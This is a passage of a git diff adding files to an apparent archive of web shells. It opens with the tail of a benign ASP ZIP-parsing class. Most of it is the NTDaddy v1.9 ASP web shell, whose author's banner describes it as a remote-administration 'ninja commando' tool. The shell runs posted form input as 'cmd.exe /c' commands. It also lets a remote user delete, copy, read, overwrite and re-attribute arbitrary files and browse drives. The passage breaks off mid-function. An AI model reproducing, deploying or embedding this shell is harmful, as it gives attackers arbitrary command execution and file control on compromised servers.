+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/NT Addy.asp.txt b/xakep-shells/ASP/NT Addy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/xakep-shells/ASP/NT Addy.asp.txt	
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
